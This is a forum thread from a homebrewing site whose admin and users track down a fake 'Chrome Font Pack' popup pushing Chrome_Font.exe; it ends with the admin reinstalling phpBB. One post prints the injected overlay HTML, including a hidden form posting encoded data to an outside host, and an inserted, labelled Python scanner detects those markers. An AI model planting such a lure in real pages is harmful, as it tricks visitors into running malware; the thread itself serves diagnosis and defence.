
Attack / Virus

Posted: Tue Mar 14, 2017 10:23 am
by RubberToe
Hey everyone,

A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.

If you see any page asking you to install a missing font, DO NOT DO IT.

If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.

If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.

Thanks,
-Rob

Re: Attack / Virus

Posted: Tue Mar 14, 2017 10:27 am
by GAM
Lots of it going around.

Thanks Rob.

S

Re: Attack / Virus

Posted: Tue Mar 14, 2017 10:37 am
by jacinthebox
Yeah, it's a fake font install... only an issue for Chrome users.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 10:45 am
by RubberToe
I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.

Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 11:15 am
by jacinthebox
I had it on my home PC.

I resolved it by going to settings/advanced settings/reset settings.

It went away.

https://malwaretips.com/blogs/remove-ch ... exe-virus/

Bottom of the page... malware software didn't pick up on anything... maybe because I didn't click install on the virus popup.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 12:34 pm
by LeafMan66_67
Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:

Re: Attack / Virus

Posted: Tue Mar 14, 2017 12:47 pm
by RubberToe
While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 1:15 pm
by LeafMan66_67
RubberToe wrote: While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Can no longer get it to pop up.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 1:23 pm
by RubberToe
Odd. If you can get it to happen again please update.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 1:55 pm
by RubberToe
WordPress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through its files there was something fishy as well. WordPress has been a common attack vector for a long time, and we don't maintain ours. Therefore I figure it's a liability so I removed it.

If anyone wants to replace the main web page I'm open to suggestions.

If anyone can reproduce this Chrome font thing I would like to know.

Thanks,
-Rob

Re: Attack / Virus

Posted: Tue Mar 14, 2017 3:10 pm
by MarkPower
Hey Rob,

I can reproduce by doing a Google search for "site:brewnosers.org brewing". Any forum link I click will cause the font thing to open. If I view source it does have Hoefler in the text.

Code:

<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>
I'm using Windows 10 and Chrome version 56.0.2924.87.
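
An added example, not part of any post in this thread: a Python check that scans saved page source for the markers visible in the snippet above (the dm-overlay / dm-modal ids, the lure text, and a form that posts hidden fields to another host). The class and function names and the sample strings are constructed for illustration, and offsite.example is a placeholder host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
# Markers taken from the overlay markup posted in this thread.
LURE_STRINGS = ("HoeflerText", "Chrome Font Pack", "Chrome_Font.exe")
OVERLAY_IDS = {"dm-overlay", "dm-modal"}

class OverlayScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.findings = []
        self._in_offsite_form = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if a.get("id") in OVERLAY_IDS:
            self.findings.append(("overlay-id", a["id"]))
        if tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            # A relative action has no host, so it stays on the site.
            same = host == self.site_host or host.endswith("." + self.site_host)
            self._in_offsite_form = bool(host) and not same
            if self._in_offsite_form:
                self.findings.append(("offsite-form", host))
        elif tag == "input" and self._in_offsite_form:
            if a.get("type", "").lower() == "hidden":
                self.findings.append(("hidden-field-to-offsite-form", a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_offsite_form = False

    def handle_data(self, data):
        self.findings += [("lure-text", s) for s in LURE_STRINGS if s in data]

def scan_page(html, site_host):
    """Return (kind, detail) findings for one saved page source."""
    scanner = OverlayScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples: a trimmed overlay with placeholder host/value, and a normal forum form.
INFECTED = ('<div id="dm-overlay"><div id="dm-modal"><p>The "HoeflerText" font wasn\'t found.</p>'
            '<form action="http://offsite.example/main.php" method="post">'
            "<input type='hidden' name='infol' value='PLACEHOLDER' /></form></div></div>")
CLEAN = '<form action="./search.php"><input type="hidden" name="sid" value="x"></form>'
if __name__ == "__main__":
    print(scan_page(INFECTED, "brewnosers.org"), scan_page(CLEAN, "brewnosers.org"))
```

Since the overlay in this thread only showed up for some visitors, an empty result on one saved copy does not show the site is clean; run it on source captured at the moment the popup appears.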

Re: Attack / Virus

Posted: Tue Mar 14, 2017 3:14 pm
by MarkPower
Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome I had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snippet I posted.

Re: Attack / Virus

Posted: Tue Mar 14, 2017 3:20 pm
by RubberToe
Thanks for the info, Mark!

Re: Attack / Virus

Posted: Thu Mar 16, 2017 4:37 pm
by jimboh
I used Chrome to access the site for the first time today, had been using Firefox. Got the virus warning. Tried to view source but the popup no longer appears.

Re: Attack / Virus

Posted: Thu Mar 16, 2017 11:48 pm
by jimboh
Hi, I am using a different computer and visited the site using Chrome and got the virus. I saved the source for the whole page if it's any use to you. Let me know if you want me to upload the txt file as an attachment or email it?
I got there by typing brewnosers in search and it was the first.
The Google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw

I believe it's cached so it may be a problem you no longer have. Don't know if you can request Google to refetch the page due to this issue.

Re: Attack / Virus

Posted: Sat Mar 18, 2017 1:21 pm
by RubberToe
Thanks.

Re: Attack / Virus

Posted: Thu Mar 23, 2017 4:34 pm
by danlatimer
It just happened to me again.

This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/

Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it :S http://forum.odroid.com/viewtopic.php?t=25568

After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.

Here are a few pictures of it happening

Image
Image

Re: Attack / Virus

Posted: Thu Mar 23, 2017 6:39 pm
by RubberToe
Thanks, I'm digging again.

Re: Attack / Virus

Posted: Thu Mar 23, 2017 6:43 pm
by RubberToe
Screw this, I'm installing a fresh copy of phpBB. Here goes... don't worry, I have lots of backups. :)

Re: Attack / Virus

Posted: Thu Mar 23, 2017 7:45 pm
by RubberToe
The site has been upgraded. Now I have to fix the style. And new Tapatalk!